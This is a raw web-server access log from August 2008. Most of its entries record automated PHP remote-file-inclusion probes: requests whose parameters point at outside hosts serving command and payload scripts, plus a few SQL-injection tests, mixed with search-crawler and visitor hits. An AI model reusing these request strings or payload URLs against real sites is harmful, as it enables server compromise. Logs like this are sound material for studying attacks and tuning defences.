200.203.121.1 - - [07/Aug/2008:09:00:13 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:09:00:13 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:09:00:13 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.28 - - [07/Aug/2008:09:00:53 -0700] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
85.119.157.77 - - [07/Aug/2008:09:00:54 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [07/Aug/2008:09:00:54 -0700] "GET /logs/access_080213.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:01:16 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:01:17 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
88.158.0.5 - - [07/Aug/2008:09:01:33 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [07/Aug/2008:09:01:33 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [07/Aug/2008:09:01:38 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [07/Aug/2008:09:01:39 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [07/Aug/2008:09:01:44 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [07/Aug/2008:09:01:44 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:09:01:50 -0700] "GET /logs/access_080116.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.38.169.228 - - [07/Aug/2008:09:02:27 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.169.228 - - [07/Aug/2008:09:02:27 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.169.228 - - [07/Aug/2008:09:02:27 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:09:02:38 -0700] "GET /logs/access_080118.log///squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:09:02:41 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:09:02:41 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:09:02:41 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.134.145 - - [07/Aug/2008:09:02:59 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.134.145 - - [07/Aug/2008:09:02:59 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.134.145 - - [07/Aug/2008:09:03:00 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.178.42 - - [07/Aug/2008:09:03:11 -0700] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?mosConfig_absolute_pathhttp://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
62.152.178.42 - - [07/Aug/2008:09:03:12 -0700] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?mosConfig_absolute_pathhttp://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.253.134.145 - - [07/Aug/2008:09:03:24 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.60.207.171 - - [07/Aug/2008:09:03:50 -0700] "GET /logs//adminoneadmin/newspublish/include.php?path[docroot]=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.60.207.171 - - [07/Aug/2008:09:03:50 -0700] "GET //adminoneadmin/newspublish/include.php?path[docroot]=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:04:01 -0700] "GET /logs/access_080224.log%20//?path%5Bdocroot%5D=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.251.141.233 - - [07/Aug/2008:09:04:41 -0700] "GET /logs/access_080404.log/db.php?path_local=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.251.141.233 - - [07/Aug/2008:09:04:46 -0700] "GET /db.php?path_local=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.251.141.233 - - [07/Aug/2008:09:04:51 -0700] "GET /logs/db.php?path_local=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.251.162.130 - - [07/Aug/2008:09:05:10 -0700] "GET /logs/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [07/Aug/2008:09:05:12 -0700] "GET /modules/vWar_Account/includes/functions_common.php?vwar_root2=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.186.90 - - [07/Aug/2008:09:05:13 -0700] "GET /logs/access_080105.log//SQuery/lib/gore.php?libpath=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.186.90 - - [07/Aug/2008:09:05:13 -0700] "GET //SQuery/lib/gore.php?libpath=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.186.90 - - [07/Aug/2008:09:05:13 -0700] "GET /logs//SQuery/lib/gore.php?libpath=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:05:16 -0700] "GET /logs/index.php?incl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:05:16 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:05:21 -0700] "GET /index.php?incl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18359 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:05:22 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
75.108.76.182 - - [07/Aug/2008:09:06:14 -0700] "GET / HTTP/1.1" 200 18257 "http://forums.off-road.com/jeep-short-wheelbase/162537-amc-jeep-cj10a-aircraft-tug-have-questions.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:06:41 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:06:41 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.119.157.77 - - [07/Aug/2008:09:06:54 -0700] "GET /logs/access_080322.log//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [07/Aug/2008:09:06:55 -0700] "GET /logs/access_080322.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.85.186 - - [07/Aug/2008:09:06:55 -0700] "GET /logs/access_080105.log//SQuery/lib/gore.php?libpath=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.85.186 - - [07/Aug/2008:09:06:55 -0700] "GET //SQuery/lib/gore.php?libpath=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.119.157.77 - - [07/Aug/2008:09:06:55 -0700] "GET //system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.85.186 - - [07/Aug/2008:09:06:55 -0700] "GET /logs//SQuery/lib/gore.php?libpath=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.119.157.77 - - [07/Aug/2008:09:06:56 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [07/Aug/2008:09:06:56 -0700] "GET /logs//system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [07/Aug/2008:09:06:57 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
63.251.141.233 - - [07/Aug/2008:09:08:09 -0700] "GET /logs/access_080401.log/db.php?path_local=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:08:49 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:08:50 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:08:50 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:09:09:15 -0700] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:09:09:16 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.22.143.171 - - [07/Aug/2008:09:09:58 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://adecova.com/descargas/babih.pdf1/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
84.22.143.171 - - [07/Aug/2008:09:09:58 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://adecova.com/descargas/babih.pdf1/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:10:28 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:10:34 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:03 -0700] "GET /logs/access_080404.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:03 -0700] "GET /logs/access_080404.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:04 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:04 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:04 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
65.55.211.21 - - [07/Aug/2008:09:11:05 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:05 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
65.55.211.21 - - [07/Aug/2008:09:11:07 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.1" 200 6910 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:08 -0700] "GET /logs/access_080303.log/index.php?incl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:08 -0700] "GET /logs/access_080303.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
65.55.211.21 - - [07/Aug/2008:09:11:09 -0700] "GET /blog/?show=gallery&pageid=17 HTTP/1.1" 200 54327 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:10 -0700] "GET /index.php?incl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18375 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:10 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:11 -0700] "GET /logs/index.php?incl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:11 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:13 -0700] "GET /logs/access_080221.log/index.php?incl=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:11:13 -0700] "GET /logs/access_080221.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:12:47 -0700] "GET /logs/port.php?content=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:12:47 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:12:47 -0700] "GET /port.php?content=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:12:48 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:09:13:07 -0700] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:09:13:10 -0700] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 18601 "-" "libwww-perl/5.803" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:13:10 -0700] "GET /logs/access_080209.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:09:13:10 -0700] "GET /logs/access_080209.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.160.200.228 - - [07/Aug/2008:09:13:31 -0700] "GET /logs/db.php?path_local=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.200.228 - - [07/Aug/2008:09:13:31 -0700] "GET /db.php?path_local=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:09:14:07 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bloggreenwood.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:09:15:02 -0700] "GET /logs/access_080207.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bloggreenwood.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:04 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:06 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:06 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:06 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:06 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:10 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:11 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:11 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:12 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:15:12 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:17:51 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:17:51 -0700] "GET /logs/access_080320.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:17:51 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:18:02 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:18:02 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:18:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:18:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.236.242 - - [07/Aug/2008:09:19:41 -0700] "GET /logs/access_080215.log/shop.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [07/Aug/2008:09:19:41 -0700] "GET /shop.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [07/Aug/2008:09:19:42 -0700] "GET /logs/shop.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
